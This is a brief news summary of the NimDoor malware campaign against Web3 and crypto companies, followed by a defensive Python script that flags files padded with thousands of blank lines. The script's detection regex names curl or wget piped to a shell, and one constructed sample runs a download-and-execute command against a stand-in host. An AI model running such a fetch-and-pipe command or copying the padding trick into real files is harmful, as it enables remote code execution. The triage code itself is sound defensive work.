Malware campaign targets Web3 and crypto platforms
Briefly

North Korean threat actors have launched a sophisticated campaign using Nim-compiled malware, dubbed NimDoor, aimed primarily at Web3 and cryptocurrency companies. The attacks rely on social engineering: in one incident, an attacker impersonated a trusted contact to gain initial access to a startup. Several malicious components were then installed, including a Mach-O binary that decrypted and executed payloads using techniques such as code injection. The campaign's multi-binary architecture is built for persistence on the host and for exfiltration of data from it.
NimDoor is notable for its choice of Nim, a language rarely seen in malware; the compiled samples are technically complex and use unconventional programming techniques that slow analysis.
In the attack on the Web3 startup, initial contact came through Telegram, and the victim was led to run a disguised "Zoom SDK update" that installed multiple malicious components.
The lure file was padded with roughly 10,000 empty lines, a crude obfuscation that pushes the real content far below the top of the file; it downloaded and executed a Mach-O payload that communicated with its command-and-control server over an encrypted WebSocket.
CoreKitAgent, the most complex component, is an event-driven binary responsible for persistence and for the implant's core functionality on compromised hosts.
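The blank-line padding described above is easy to triage mechanically. The following is an added example, not code from the Techzine article or from the NimDoor research it summarises: a small heuristic that reports where a file's real content starts, how much of it is one run of blank lines, and whether it contains a generic "download and execute" pattern. The thresholds, the indicator regex and both sample inputs are assumptions constructed for illustration, not the campaign's actual artifacts or indicators.

```python
"""Triage heuristic for scripts padded with thousands of blank lines.

Added example; sample inputs and thresholds are constructed, not real
NimDoor artifacts or indicators.
"""
import re
from dataclasses import dataclass

# Hypothetical download-then-execute indicators: "curl/wget ... | sh" and
# the AppleScript shell-out keyword. Illustrative only, not campaign IOCs.
DOWNLOAD_EXEC = re.compile(
    r"(curl|wget)\b[^\n|]*\|\s*(sh|bash|zsh)\b"
    r"|do shell script\b",
    re.IGNORECASE,
)


@dataclass
class PaddingReport:
    total_lines: int
    longest_blank_run: int
    first_nonblank_line: int   # 1-based; 0 if the file has no content
    download_exec: bool

    @property
    def blank_fraction(self) -> float:
        """Share of the file taken up by the single longest blank run."""
        if self.total_lines == 0:
            return 0.0
        return self.longest_blank_run / self.total_lines


def analyse(text: str) -> PaddingReport:
    """Measure blank-line padding and scan for download-and-execute text."""
    lines = text.split("\n")
    longest = run = 0
    first_nonblank = 0
    for idx, line in enumerate(lines, start=1):
        if line.strip() == "":
            run += 1
            longest = max(longest, run)
        else:
            run = 0
            if first_nonblank == 0:
                first_nonblank = idx
    return PaddingReport(
        total_lines=len(lines),
        longest_blank_run=longest,
        first_nonblank_line=first_nonblank,
        download_exec=bool(DOWNLOAD_EXEC.search(text)),
    )


def is_suspicious(report: PaddingReport,
                  min_blank_run: int = 1000,
                  min_blank_fraction: float = 0.9) -> bool:
    """Flag files dominated by one blank run. Thresholds are assumed; tune
    them so legitimate generated scripts in your environment do not trip."""
    return (report.longest_blank_run >= min_blank_run
            and report.blank_fraction >= min_blank_fraction)


# Constructed samples: a benign helper and a padded lure whose only real
# line sits after 10,000 empty ones.
BENIGN = "#!/bin/sh\n\n# update helper\n\necho updating\n"
PADDED = ("\n" * 10000
          + 'do shell script "curl -s http://example.invalid/x | sh"\n')


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("padded", PADDED)):
        rep = analyse(sample)
        print(f"{name}: content starts at line {rep.first_nonblank_line}, "
              f"longest blank run {rep.longest_blank_run}/{rep.total_lines}, "
              f"download-exec={rep.download_exec}, "
              f"suspicious={is_suspicious(rep)}")
```

Run it on a directory of recently dropped `.scpt`, `.sh` or `.py` files; a high `first_nonblank_line` combined with a download-and-execute hit is worth a manual look even when the file otherwise passes content-based scanning.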
Read at Techzine Global